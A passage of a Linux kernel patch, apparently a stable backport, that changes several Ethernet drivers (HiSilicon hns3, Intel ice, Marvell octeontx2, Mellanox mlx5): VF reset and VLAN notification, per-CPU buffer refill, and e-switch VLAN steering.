++static void hclge_sync_promisc_mode(struct hclge_dev *hdev)
++{
++	struct hclge_vport *vport;
++	int ret;
++	u16 i;
+ 
+-		ret = hclge_cmd_set_promisc_mode(hdev, vport->vport_id, uc_en,
+-						 mc_en, bc_en);
+-		if (ret) {
+-			set_bit(HCLGE_VPORT_STATE_PROMISC_CHANGE,
+-				&vport->state);
++	for (i = 0; i < hdev->num_alloc_vport; i++) {
++		vport = &hdev->vport[i];
++
++		ret = hclge_sync_vport_promisc_mode(vport);
++		if (ret)
+ 			return;
+-		}
+-		hclge_set_vport_vlan_fltr_change(vport);
+ 	}
+ }
+ 
+@@ -12944,6 +12979,11 @@ static void hclge_clear_vport_vf_info(struct hclge_vport *vport, int vfid)
+ 	struct hclge_vlan_info vlan_info;
+ 	int ret;
+ 
++	clear_bit(HCLGE_VPORT_STATE_INITED, &vport->state);
++	clear_bit(HCLGE_VPORT_STATE_ALIVE, &vport->state);
++	vport->need_notify = 0;
++	vport->mps = 0;
++
+ 	/* after disable sriov, clean VF rate configured by PF */
+ 	ret = hclge_tm_qs_shaper_cfg(vport, 0);
+ 	if (ret)
+diff --git a/drivers/net/ethernet/hisilicon/hns3/hns3pf/hclge_main.h b/drivers/net/ethernet/hisilicon/hns3/hns3pf/hclge_main.h
+index 495b639b0dc24..13f23d606e77b 100644
+--- a/drivers/net/ethernet/hisilicon/hns3/hns3pf/hclge_main.h
++++ b/drivers/net/ethernet/hisilicon/hns3/hns3pf/hclge_main.h
+@@ -995,9 +995,15 @@ enum HCLGE_VPORT_STATE {
+ 	HCLGE_VPORT_STATE_MAC_TBL_CHANGE,
+ 	HCLGE_VPORT_STATE_PROMISC_CHANGE,
+ 	HCLGE_VPORT_STATE_VLAN_FLTR_CHANGE,
++	HCLGE_VPORT_STATE_INITED,
+ 	HCLGE_VPORT_STATE_MAX
+ };
+ 
++enum HCLGE_VPORT_NEED_NOTIFY {
++	HCLGE_VPORT_NEED_NOTIFY_RESET,
++	HCLGE_VPORT_NEED_NOTIFY_VF_VLAN,
++};
++
+ struct hclge_vlan_info {
+ 	u16 vlan_proto; /* so far support 802.1Q only */
+ 	u16 qos;
+@@ -1044,6 +1050,7 @@ struct hclge_vport {
+ 	struct hnae3_handle roce;
+ 
+ 	unsigned long state;
++	unsigned long need_notify;
+ 	unsigned long last_active_jiffies;
+ 	u32 mps; /* Max packet size */
+ 	struct hclge_vf_info vf_info;
+diff --git a/drivers/net/ethernet/hisilicon/hns3/hns3pf/hclge_mbx.c b/drivers/net/ethernet/hisilicon/hns3/hns3pf/hclge_mbx.c
+index a7b06c63143cc..04ff9bf121853 100644
+--- a/drivers/net/ethernet/hisilicon/hns3/hns3pf/hclge_mbx.c
++++ b/drivers/net/ethernet/hisilicon/hns3/hns3pf/hclge_mbx.c
+@@ -124,17 +124,26 @@ static int hclge_send_mbx_msg(struct hclge_vport *vport, u8 *msg, u16 msg_len,
+ 	return status;
+ }
+ 
++static int hclge_inform_vf_reset(struct hclge_vport *vport, u16 reset_type)
++{
++	__le16 msg_data;
++	u8 dest_vfid;
++
++	dest_vfid = (u8)vport->vport_id;
++	msg_data = cpu_to_le16(reset_type);
++
++	/* send this requested info to VF */
++	return hclge_send_mbx_msg(vport, (u8 *)&msg_data, sizeof(msg_data),
++				  HCLGE_MBX_ASSERTING_RESET, dest_vfid);
++}
++
+ int hclge_inform_reset_assert_to_vf(struct hclge_vport *vport)
+ {
+ 	struct hclge_dev *hdev = vport->back;
+-	__le16 msg_data;
+ 	u16 reset_type;
+-	u8 dest_vfid;
+ 
+ 	BUILD_BUG_ON(HNAE3_MAX_RESET > U16_MAX);
+ 
+-	dest_vfid = (u8)vport->vport_id;
+-
+ 	if (hdev->reset_type == HNAE3_FUNC_RESET)
+ 		reset_type = HNAE3_VF_PF_FUNC_RESET;
+ 	else if (hdev->reset_type == HNAE3_FLR_RESET)
+@@ -142,11 +151,7 @@ int hclge_inform_reset_assert_to_vf(struct hclge_vport *vport)
+ 	else
+ 		reset_type = HNAE3_VF_FUNC_RESET;
+ 
+-	msg_data = cpu_to_le16(reset_type);
+-
+-	/* send this requested info to VF */
+-	return hclge_send_mbx_msg(vport, (u8 *)&msg_data, sizeof(msg_data),
+-				  HCLGE_MBX_ASSERTING_RESET, dest_vfid);
++	return hclge_inform_vf_reset(vport, reset_type);
+ }
+ 
+ static void hclge_free_vector_ring_chain(struct hnae3_ring_chain_node *head)
+@@ -652,9 +657,56 @@ static int hclge_reset_vf(struct hclge_vport *vport)
+ 	return hclge_func_reset_cmd(hdev, vport->vport_id);
+ }
+ 
++static void hclge_notify_vf_config(struct hclge_vport *vport)
++{
++	struct hclge_dev *hdev = vport->back;
++	struct hnae3_ae_dev *ae_dev = pci_get_drvdata(hdev->pdev);
++	struct hclge_port_base_vlan_config *vlan_cfg;
++	int ret;
++
++	hclge_push_vf_link_status(vport);
++	if (test_bit(HCLGE_VPORT_NEED_NOTIFY_RESET, &vport->need_notify)) {
++		ret = hclge_inform_vf_reset(vport, HNAE3_VF_PF_FUNC_RESET);
++		if (ret) {
++			dev_err(&hdev->pdev->dev,
++				"failed to inform VF %u reset!",
++				vport->vport_id - HCLGE_VF_VPORT_START_NUM);
++			return;
++		}
++		vport->need_notify = 0;
++		return;
++	}
++
++	if (ae_dev->dev_version < HNAE3_DEVICE_VERSION_V3 &&
++	    test_bit(HCLGE_VPORT_NEED_NOTIFY_VF_VLAN, &vport->need_notify)) {
++		vlan_cfg = &vport->port_base_vlan_cfg;
++		ret = hclge_push_vf_port_base_vlan_info(&hdev->vport[0],
++							vport->vport_id,
++							vlan_cfg->state,
++							&vlan_cfg->vlan_info);
++		if (ret) {
++			dev_err(&hdev->pdev->dev,
++				"failed to inform VF %u port base vlan!",
++				vport->vport_id - HCLGE_VF_VPORT_START_NUM);
++			return;
++		}
++		clear_bit(HCLGE_VPORT_NEED_NOTIFY_VF_VLAN, &vport->need_notify);
++	}
++}
++
+ static void hclge_vf_keep_alive(struct hclge_vport *vport)
+ {
++	struct hclge_dev *hdev = vport->back;
++
+ 	vport->last_active_jiffies = jiffies;
++
++	if (test_bit(HCLGE_VPORT_STATE_INITED, &vport->state) &&
++	    !test_bit(HCLGE_VPORT_STATE_ALIVE, &vport->state)) {
++		set_bit(HCLGE_VPORT_STATE_ALIVE, &vport->state);
++		dev_info(&hdev->pdev->dev, "VF %u is alive!",
++			 vport->vport_id - HCLGE_VF_VPORT_START_NUM);
++		hclge_notify_vf_config(vport);
++	}
+ }
+ 
+ static int hclge_set_vf_mtu(struct hclge_vport *vport,
+@@ -954,6 +1006,7 @@ static int hclge_mbx_vf_uninit_handler(struct hclge_mbx_ops_param *param)
+ 	hclge_rm_vport_all_mac_table(param->vport, true,
+ 				     HCLGE_MAC_ADDR_MC);
+ 	hclge_rm_vport_all_vlan_table(param->vport, true);
++	param->vport->mps = 0;
+ 	return 0;
+ }
+ 
+diff --git a/drivers/net/ethernet/hisilicon/hns3/hns3vf/hclgevf_main.c b/drivers/net/ethernet/hisilicon/hns3/hns3vf/hclgevf_main.c
+index db6f7cdba9587..081bd2c3f2891 100644
+--- a/drivers/net/ethernet/hisilicon/hns3/hns3vf/hclgevf_main.c
++++ b/drivers/net/ethernet/hisilicon/hns3/hns3vf/hclgevf_main.c
+@@ -2767,7 +2767,8 @@ static int hclgevf_pci_reset(struct hclgevf_dev *hdev)
+ 	struct pci_dev *pdev = hdev->pdev;
+ 	int ret = 0;
+ 
+-	if (hdev->reset_type == HNAE3_VF_FULL_RESET &&
++	if ((hdev->reset_type == HNAE3_VF_FULL_RESET ||
++	     hdev->reset_type == HNAE3_FLR_RESET) &&
+ 	    test_bit(HCLGEVF_STATE_IRQ_INITED, &hdev->state)) {
+ 		hclgevf_misc_irq_uninit(hdev);
+ 		hclgevf_uninit_msi(hdev);
+diff --git a/drivers/net/ethernet/intel/ice/ice_xsk.c b/drivers/net/ethernet/intel/ice/ice_xsk.c
+index 056c904b83ccb..79fa65d1cf201 100644
+--- a/drivers/net/ethernet/intel/ice/ice_xsk.c
++++ b/drivers/net/ethernet/intel/ice/ice_xsk.c
+@@ -772,7 +772,7 @@ construct_skb:
+ static void
+ ice_clean_xdp_tx_buf(struct ice_tx_ring *xdp_ring, struct ice_tx_buf *tx_buf)
+ {
+-	xdp_return_frame((struct xdp_frame *)tx_buf->raw_buf);
++	page_frag_free(tx_buf->raw_buf);
+ 	xdp_ring->xdp_tx_active--;
+ 	dma_unmap_single(xdp_ring->dev, dma_unmap_addr(tx_buf, dma),
+ 			 dma_unmap_len(tx_buf, len), DMA_TO_DEVICE);
+diff --git a/drivers/net/ethernet/marvell/octeontx2/nic/otx2_common.c b/drivers/net/ethernet/marvell/octeontx2/nic/otx2_common.c
+index 9e10e7471b887..88f8772a61cd5 100644
+--- a/drivers/net/ethernet/marvell/octeontx2/nic/otx2_common.c
++++ b/drivers/net/ethernet/marvell/octeontx2/nic/otx2_common.c
+@@ -1012,6 +1012,7 @@ static void otx2_pool_refill_task(struct work_struct *work)
+ 	rbpool = cq->rbpool;
+ 	free_ptrs = cq->pool_ptrs;
+ 
++	get_cpu();
+ 	while (cq->pool_ptrs) {
+ 		if (otx2_alloc_rbuf(pfvf, rbpool, &bufptr)) {
+ 			/* Schedule a WQ if we fails to free atleast half of the
+@@ -1031,6 +1032,7 @@ static void otx2_pool_refill_task(struct work_struct *work)
+ 		pfvf->hw_ops->aura_freeptr(pfvf, qidx, bufptr + OTX2_HEAD_ROOM);
+ 		cq->pool_ptrs--;
+ 	}
++	put_cpu();
+ 	cq->refill_task_sched = false;
+ }
+ 
+@@ -1368,6 +1370,7 @@ int otx2_sq_aura_pool_init(struct otx2_nic *pfvf)
+ 	if (err)
+ 		goto fail;
+ 
++	get_cpu();
+ 	/* Allocate pointers and free them to aura/pool */
+ 	for (qidx = 0; qidx < hw->tot_tx_queues; qidx++) {
+ 		pool_id = otx2_get_pool_idx(pfvf, AURA_NIX_SQ, qidx);
+@@ -1376,18 +1379,24 @@ int otx2_sq_aura_pool_init(struct otx2_nic *pfvf)
+ 		sq = &qset->sq[qidx];
+ 		sq->sqb_count = 0;
+ 		sq->sqb_ptrs = kcalloc(num_sqbs, sizeof(*sq->sqb_ptrs), GFP_KERNEL);
+-		if (!sq->sqb_ptrs)
+-			return -ENOMEM;
++		if (!sq->sqb_ptrs) {
++			err = -ENOMEM;
++			goto err_mem;
++		}
+ 
+ 		for (ptr = 0; ptr < num_sqbs; ptr++) {
+-			if (otx2_alloc_rbuf(pfvf, pool, &bufptr))
+-				return -ENOMEM;
++			err = otx2_alloc_rbuf(pfvf, pool, &bufptr);
++			if (err)
++				goto err_mem;
+ 			pfvf->hw_ops->aura_freeptr(pfvf, pool_id, bufptr);
+ 			sq->sqb_ptrs[sq->sqb_count++] = (u64)bufptr;
+ 		}
+ 	}
+ 
+-	return 0;
++err_mem:
++	put_cpu();
++	return err ? -ENOMEM : 0;
++
+ fail:
+ 	otx2_mbox_reset(&pfvf->mbox.mbox, 0);
+ 	otx2_aura_pool_free(pfvf);
+@@ -1426,18 +1435,21 @@ int otx2_rq_aura_pool_init(struct otx2_nic *pfvf)
+ 	if (err)
+ 		goto fail;
+ 
++	get_cpu();
+ 	/* Allocate pointers and free them to aura/pool */
+ 	for (pool_id = 0; pool_id < hw->rqpool_cnt; pool_id++) {
+ 		pool = &pfvf->qset.pool[pool_id];
+ 		for (ptr = 0; ptr < num_ptrs; ptr++) {
+-			if (otx2_alloc_rbuf(pfvf, pool, &bufptr))
+-				return -ENOMEM;
++			err = otx2_alloc_rbuf(pfvf, pool, &bufptr);
++			if (err)
++				goto err_mem;
+ 			pfvf->hw_ops->aura_freeptr(pfvf, pool_id,
+ 						   bufptr + OTX2_HEAD_ROOM);
+ 		}
+ 	}
+-
+-	return 0;
++err_mem:
++	put_cpu();
++	return err ? -ENOMEM : 0;
+ fail:
+ 	otx2_mbox_reset(&pfvf->mbox.mbox, 0);
+ 	otx2_aura_pool_free(pfvf);
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/devlink.c b/drivers/net/ethernet/mellanox/mlx5/core/devlink.c
+index 66c6a7017695d..97e9ec44a759b 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/devlink.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/devlink.c
+@@ -468,7 +468,7 @@ static int mlx5_devlink_enable_roce_validate(struct devlink *devlink, u32 id,
+ 	bool new_state = val.vbool;
+ 
+ 	if (new_state && !MLX5_CAP_GEN(dev, roce) &&
+-	    !MLX5_CAP_GEN(dev, roce_rw_supported)) {
++	    !(MLX5_CAP_GEN(dev, roce_rw_supported) && MLX5_CAP_GEN_MAX(dev, roce))) {
+ 		NL_SET_ERR_MSG_MOD(extack, "Device doesn't support RoCE");
+ 		return -EOPNOTSUPP;
+ 	}
+@@ -563,7 +563,7 @@ static int mlx5_devlink_eq_depth_validate(struct devlink *devlink, u32 id,
+ 					  union devlink_param_value val,
+ 					  struct netlink_ext_ack *extack)
+ {
+-	return (val.vu16 >= 64 && val.vu16 <= 4096) ? 0 : -EINVAL;
++	return (val.vu32 >= 64 && val.vu32 <= 4096) ? 0 : -EINVAL;
+ }
+ 
+ static const struct devlink_param mlx5_devlink_params[] = {
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/en/reporter_rx.c b/drivers/net/ethernet/mellanox/mlx5/core/en/reporter_rx.c
+index 5f6f95ad6888c..1ae15b8536a85 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/en/reporter_rx.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/en/reporter_rx.c
+@@ -459,7 +459,11 @@ static int mlx5e_rx_reporter_diagnose(struct devlink_health_reporter *reporter,
+ 		goto unlock;
+ 
+ 	for (i = 0; i < priv->channels.num; i++) {
+-		struct mlx5e_rq *rq = &priv->channels.c[i]->rq;
++		struct mlx5e_channel *c = priv->channels.c[i];
++		struct mlx5e_rq *rq;
++
++		rq = test_bit(MLX5E_CHANNEL_STATE_XSK, c->state) ?
++			&c->xskrq : &c->rq;
+ 
+ 		err = mlx5e_rx_reporter_build_diagnose_output(rq, fmsg);
+ 		if (err)
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/en/tc_ct.c b/drivers/net/ethernet/mellanox/mlx5/core/en/tc_ct.c
+index 864ce0c393e61..f01f7dfdbcf88 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/en/tc_ct.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/en/tc_ct.c
+@@ -2080,14 +2080,9 @@ out_err:
+ static void
+ mlx5_ct_tc_create_dbgfs(struct mlx5_tc_ct_priv *ct_priv)
+ {
+-	bool is_fdb = ct_priv->ns_type == MLX5_FLOW_NAMESPACE_FDB;
+ 	struct mlx5_tc_ct_debugfs *ct_dbgfs = &ct_priv->debugfs;
+-	char dirname[16] = {};
+ 
+-	if (sscanf(dirname, "ct_%s", is_fdb ? "fdb" : "nic") < 0)
+-		return;
+-
+-	ct_dbgfs->root = debugfs_create_dir(dirname, mlx5_debugfs_get_dev_root(ct_priv->dev));
++	ct_dbgfs->root = debugfs_create_dir("ct", mlx5_debugfs_get_dev_root(ct_priv->dev));
+ 	debugfs_create_atomic_t("offloaded", 0400, ct_dbgfs->root,
+ 				&ct_dbgfs->stats.offloaded);
+ 	debugfs_create_atomic_t("rx_dropped", 0400, ct_dbgfs->root,
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/en/tc_tun_encap.c b/drivers/net/ethernet/mellanox/mlx5/core/en/tc_tun_encap.c
+index ff73d25bc6eb8..2aaf8ab857b8f 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/en/tc_tun_encap.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/en/tc_tun_encap.c
+@@ -222,7 +222,7 @@ void mlx5e_tc_encap_flows_del(struct mlx5e_priv *priv,
+ 	int err;
+ 
+ 	list_for_each_entry(flow, flow_list, tmp_list) {
+-		if (!mlx5e_is_offloaded_flow(flow) || flow_flag_test(flow, SLOW))
++		if (!mlx5e_is_offloaded_flow(flow))
+ 			continue;
+ 
+ 		attr = mlx5e_tc_get_encap_attr(flow);
+@@ -231,6 +231,13 @@ void mlx5e_tc_encap_flows_del(struct mlx5e_priv *priv,
+ 		esw_attr->dests[flow->tmp_entry_index].flags &= ~MLX5_ESW_DEST_ENCAP_VALID;
+ 		esw_attr->dests[flow->tmp_entry_index].pkt_reformat = NULL;
+ 
++		/* Clear pkt_reformat before checking slow path flag. Because
++		 * in next iteration, the same flow is already set slow path
++		 * flag, but still need to clear the pkt_reformat.
++		 */
++		if (flow_flag_test(flow, SLOW))
++			continue;
++
+ 		/* update from encap rule to slow path rule */
+ 		spec = &flow->attr->parse_attr->spec;
+ 		rule = mlx5e_tc_offload_to_slow_path(esw, flow, spec);
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/en/tc_tun_geneve.c b/drivers/net/ethernet/mellanox/mlx5/core/en/tc_tun_geneve.c
+index f5b26f5a7de46..054d80c4e65cf 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/en/tc_tun_geneve.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/en/tc_tun_geneve.c
+@@ -273,6 +273,11 @@ static int mlx5e_tc_tun_parse_geneve_options(struct mlx5e_priv *priv,
+ 		 geneve_tlv_option_0_data, be32_to_cpu(opt_data_key));
+ 	MLX5_SET(fte_match_set_misc3, misc_3_c,
+ 		 geneve_tlv_option_0_data, be32_to_cpu(opt_data_mask));
++	if (MLX5_CAP_ESW_FLOWTABLE_FDB(priv->mdev,
++				       ft_field_support.geneve_tlv_option_0_exist)) {
++		MLX5_SET_TO_ONES(fte_match_set_misc, misc_c, geneve_tlv_option_0_exist);
++		MLX5_SET_TO_ONES(fte_match_set_misc, misc_v, geneve_tlv_option_0_exist);
++	}
+ 
+ 	spec->match_criteria_enable |= MLX5_MATCH_MISC_PARAMETERS_3;
+ 
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/en_main.c b/drivers/net/ethernet/mellanox/mlx5/core/en_main.c
+index 5e41dfdf79c80..951ede4338132 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/en_main.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/en_main.c
+@@ -1298,7 +1298,7 @@ static int mlx5e_alloc_xdpsq(struct mlx5e_channel *c,
+ 	sq->channel   = c;
+ 	sq->uar_map   = mdev->mlx5e_res.hw_objs.bfreg.map;
+ 	sq->min_inline_mode = params->tx_min_inline_mode;
+-	sq->hw_mtu    = MLX5E_SW2HW_MTU(params, params->sw_mtu);
++	sq->hw_mtu    = MLX5E_SW2HW_MTU(params, params->sw_mtu) - ETH_FCS_LEN;
+ 	sq->xsk_pool  = xsk_pool;
+ 
+ 	sq->stats = sq->xsk_pool ?
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/esw/acl/egress_lgcy.c b/drivers/net/ethernet/mellanox/mlx5/core/esw/acl/egress_lgcy.c
+index 60a73990017c2..6b4c9ffad95b2 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/esw/acl/egress_lgcy.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/esw/acl/egress_lgcy.c
+@@ -67,6 +67,7 @@ static void esw_acl_egress_lgcy_groups_destroy(struct mlx5_vport *vport)
+ int esw_acl_egress_lgcy_setup(struct mlx5_eswitch *esw,
+ 			      struct mlx5_vport *vport)
+ {
++	bool vst_mode_steering = esw_vst_mode_is_steering(esw);
+ 	struct mlx5_flow_destination drop_ctr_dst = {};
+ 	struct mlx5_flow_destination *dst = NULL;
+ 	struct mlx5_fc *drop_counter = NULL;
+@@ -77,6 +78,7 @@ int esw_acl_egress_lgcy_setup(struct mlx5_eswitch *esw,
+ 	 */
+ 	int table_size = 2;
+ 	int dest_num = 0;
++	int actions_flag;
+ 	int err = 0;
+ 
+ 	if (vport->egress.legacy.drop_counter) {
+@@ -119,8 +121,11 @@ int esw_acl_egress_lgcy_setup(struct mlx5_eswitch *esw,
+ 		  vport->vport, vport->info.vlan, vport->info.qos);
+ 
+ 	/* Allowed vlan rule */
++	actions_flag = MLX5_FLOW_CONTEXT_ACTION_ALLOW;
++	if (vst_mode_steering)
++		actions_flag |= MLX5_FLOW_CONTEXT_ACTION_VLAN_POP;
+ 	err = esw_egress_acl_vlan_create(esw, vport, NULL, vport->info.vlan,
+-					 MLX5_FLOW_CONTEXT_ACTION_ALLOW);
++					 actions_flag);
+ 	if (err)
+ 		goto out;
+ 
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/esw/acl/ingress_lgcy.c b/drivers/net/ethernet/mellanox/mlx5/core/esw/acl/ingress_lgcy.c
+index b1a5199260f69..093ed86a0acd8 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/esw/acl/ingress_lgcy.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/esw/acl/ingress_lgcy.c
+@@ -139,11 +139,14 @@ static void esw_acl_ingress_lgcy_groups_destroy(struct mlx5_vport *vport)
+ int esw_acl_ingress_lgcy_setup(struct mlx5_eswitch *esw,
+ 			       struct mlx5_vport *vport)
+ {
++	bool vst_mode_steering = esw_vst_mode_is_steering(esw);
+ 	struct mlx5_flow_destination drop_ctr_dst = {};
+ 	struct mlx5_flow_destination *dst = NULL;
+ 	struct mlx5_flow_act flow_act = {};
+ 	struct mlx5_flow_spec *spec = NULL;
+ 	struct mlx5_fc *counter = NULL;
++	bool vst_check_cvlan = false;
++	bool vst_push_cvlan = false;
+ 	/* The ingress acl table contains 4 groups
+ 	 * (2 active rules at the same time -
+ 	 *      1 allow rule from one of the first 3 groups.
+@@ -203,7 +206,26 @@ int esw_acl_ingress_lgcy_setup(struct mlx5_eswitch *esw,
+ 		goto out;
+ 	}
+ 
+-	if (vport->info.vlan || vport->info.qos)
++	if ((vport->info.vlan || vport->info.qos)) {
++		if (vst_mode_steering)
++			vst_push_cvlan = true;
++		else if (!MLX5_CAP_ESW(esw->dev, vport_cvlan_insert_always))
++			vst_check_cvlan = true;
++	}
++
++	if (vst_check_cvlan || vport->info.spoofchk)
++		spec->match_criteria_enable = MLX5_MATCH_OUTER_HEADERS;
++
++	/* Create ingress allow rule */
++	flow_act.action = MLX5_FLOW_CONTEXT_ACTION_ALLOW;
++	if (vst_push_cvlan) {
++		flow_act.action |= MLX5_FLOW_CONTEXT_ACTION_VLAN_PUSH;
++		flow_act.vlan[0].prio = vport->info.qos;
++		flow_act.vlan[0].vid = vport->info.vlan;
++		flow_act.vlan[0].ethtype = ETH_P_8021Q;
++	}
++
++	if (vst_check_cvlan)
+ 		MLX5_SET_TO_ONES(fte_match_param, spec->match_criteria,
+ 				 outer_headers.cvlan_tag);
+ 
+@@ -218,9 +240,6 @@ int esw_acl_ingress_lgcy_setup(struct mlx5_eswitch *esw,
+ 		ether_addr_copy(smac_v, vport->info.mac);
+ 	}
+ 
+-	/* Create ingress allow rule */
+-	spec->match_criteria_enable = MLX5_MATCH_OUTER_HEADERS;
+-	flow_act.action = MLX5_FLOW_CONTEXT_ACTION_ALLOW;
+ 	vport->ingress.allow_rule = mlx5_add_flow_rules(vport->ingress.acl, spec,
+ 							&flow_act, NULL, 0);
+ 	if (IS_ERR(vport->ingress.allow_rule)) {
+@@ -232,6 +251,9 @@ int esw_acl_ingress_lgcy_setup(struct mlx5_eswitch *esw,
+ 		goto out;
+ 	}
+ 
++	if (!vst_check_cvlan && !vport->info.spoofchk)
++		goto out;
++
+ 	memset(&flow_act, 0, sizeof(flow_act));
+ 	flow_act.action = MLX5_FLOW_CONTEXT_ACTION_DROP;
+ 	/* Attach drop flow counter */
+@@ -257,7 +279,8 @@ int esw_acl_ingress_lgcy_setup(struct mlx5_eswitch *esw,
+ 	return 0;
+ 
+ out:
+-	esw_acl_ingress_lgcy_cleanup(esw, vport);
++	if (err)
++		esw_acl_ingress_lgcy_cleanup(esw, vport);
+ 	kvfree(spec);
+ 	return err;
+ }
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/eswitch.c b/drivers/net/ethernet/mellanox/mlx5/core/eswitch.c
+index 374e3fbdc2cf2..788a6ab5c4636 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/eswitch.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/eswitch.c
+@@ -161,10 +161,17 @@ static int modify_esw_vport_cvlan(struct mlx5_core_dev *dev, u16 vport,
+ 			 esw_vport_context.vport_cvlan_strip, 1);
+ 
+ 	if (set_flags & SET_VLAN_INSERT) {
+-		/* insert only if no vlan in packet */
+-		MLX5_SET(modify_esw_vport_context_in, in,
+-			 esw_vport_context.vport_cvlan_insert, 1);
+-
++		if (MLX5_CAP_ESW(dev, vport_cvlan_insert_always)) {
++			/* insert either if vlan exist in packet or not */
++			MLX5_SET(modify_esw_vport_context_in, in,
++				 esw_vport_context.vport_cvlan_insert,
++				 MLX5_VPORT_CVLAN_INSERT_ALWAYS);
++		} else {
++			/* insert only if no vlan in packet */
++			MLX5_SET(modify_esw_vport_context_in, in,
++				 esw_vport_context.vport_cvlan_insert,
++				 MLX5_VPORT_CVLAN_INSERT_WHEN_NO_CVLAN);
++		}
+ 		MLX5_SET(modify_esw_vport_context_in, in,
+ 			 esw_vport_context.cvlan_pcp, qos);
+ 		MLX5_SET(modify_esw_vport_context_in, in,
+@@ -774,6 +781,7 @@ static void esw_vport_cleanup_acl(struct mlx5_eswitch *esw,
+ 
+ static int esw_vport_setup(struct mlx5_eswitch *esw, struct mlx5_vport *vport)
+ {
++	bool vst_mode_steering = esw_vst_mode_is_steering(esw);
+ 	u16 vport_num = vport->vport;
+ 	int flags;
+ 	int err;
+@@ -800,8 +808,9 @@ static int esw_vport_setup(struct mlx5_eswitch *esw, struct mlx5_vport *vport)
+ 
+ 	flags = (vport->info.vlan || vport->info.qos) ?
+ 		SET_VLAN_STRIP | SET_VLAN_INSERT : 0;
+-	modify_esw_vport_cvlan(esw->dev, vport_num, vport->info.vlan,
+-			       vport->info.qos, flags);
++	if (esw->mode == MLX5_ESWITCH_OFFLOADS || !vst_mode_steering)
++		modify_esw_vport_cvlan(esw->dev, vport_num, vport->info.vlan,
++				       vport->info.qos, flags);
+ 
+ 	return 0;
+ }
+@@ -1805,6 +1814,7 @@ int __mlx5_eswitch_set_vport_vlan(struct mlx5_eswitch *esw,
+ 				  u16 vport, u16 vlan, u8 qos, u8 set_flags)
+ {
+ 	struct mlx5_vport *evport = mlx5_eswitch_get_vport(esw, vport);
++	bool vst_mode_steering = esw_vst_mode_is_steering(esw);
+ 	int err = 0;
+ 
+ 	if (IS_ERR(evport))
+@@ -1812,9 +1822,11 @@ int __mlx5_eswitch_set_vport_vlan(struct mlx5_eswitch *esw,
+ 	if (vlan > 4095 || qos > 7)
+ 		return -EINVAL;
+ 
+-	err = modify_esw_vport_cvlan(esw->dev, vport, vlan, qos, set_flags);
+-	if (err)
+-		return err;
++	if (esw->mode == MLX5_ESWITCH_OFFLOADS || !vst_mode_steering) {
++		err = modify_esw_vport_cvlan(esw->dev, vport, vlan, qos, set_flags);
++		if (err)
++			return err;
++	}
+ 
+ 	evport->info.vlan = vlan;
+ 	evport->info.qos = qos;
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/eswitch.h b/drivers/net/ethernet/mellanox/mlx5/core/eswitch.h
+index 3029bc1c0dd04..5db76af35d3f5 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/eswitch.h
++++ b/drivers/net/ethernet/mellanox/mlx5/core/eswitch.h
+@@ -518,6 +518,12 @@ int mlx5_eswitch_del_vlan_action(struct mlx5_eswitch *esw,
+ int __mlx5_eswitch_set_vport_vlan(struct mlx5_eswitch *esw,
+ 				  u16 vport, u16 vlan, u8 qos, u8 set_flags);
+ 
++static inline bool esw_vst_mode_is_steering(struct mlx5_eswitch *esw)
++{
++	return (MLX5_CAP_ESW_EGRESS_ACL(esw->dev, pop_vlan) &&
++		MLX5_CAP_ESW_INGRESS_ACL(esw->dev, push_vlan));
++}
++
+ static inline bool mlx5_eswitch_vlan_actions_supported(struct mlx5_core_dev *dev,
+ 						       u8 vlan_depth)
+ {
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/health.c b/drivers/net/ethernet/mellanox/mlx5/core/health.c
+index 86ed87d704f7d..96417c5feed76 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/health.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/health.c
+@@ -674,6 +674,12 @@ static void mlx5_fw_fatal_reporter_err_work(struct work_struct *work)
+ 	dev = container_of(priv, struct mlx5_core_dev, priv);
+ 	devlink = priv_to_devlink(dev);
+ 
++	mutex_lock(&dev->intf_state_mutex);
++	if (test_bit(MLX5_DROP_NEW_HEALTH_WORK, &health->flags)) {
++		mlx5_core_err(dev, "health works are not permitted at this stage\n");
++		return;
++	}
++	mutex_unlock(&dev->intf_state_mutex);
+ 	enter_error_state(dev, false);
+ 	if (IS_ERR_OR_NULL(health->fw_fatal_reporter)) {
+ 		devl_lock(devlink);
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/ipoib/ipoib.c b/drivers/net/ethernet/mellanox/mlx5/core/ipoib/ipoib.c
+index 4e3a75496dd9a..84f5352b0ce19 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/ipoib/ipoib.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/ipoib/ipoib.c
+@@ -71,6 +71,10 @@ static void mlx5i_build_nic_params(struct mlx5_core_dev *mdev,
+ 	params->packet_merge.type = MLX5E_PACKET_MERGE_NONE;
+ 	params->hard_mtu = MLX5_IB_GRH_BYTES + MLX5_IPOIB_HARD_LEN;
+ 	params->tunneled_offload_en = false;
++
++	/* CQE compression is not supported for IPoIB */
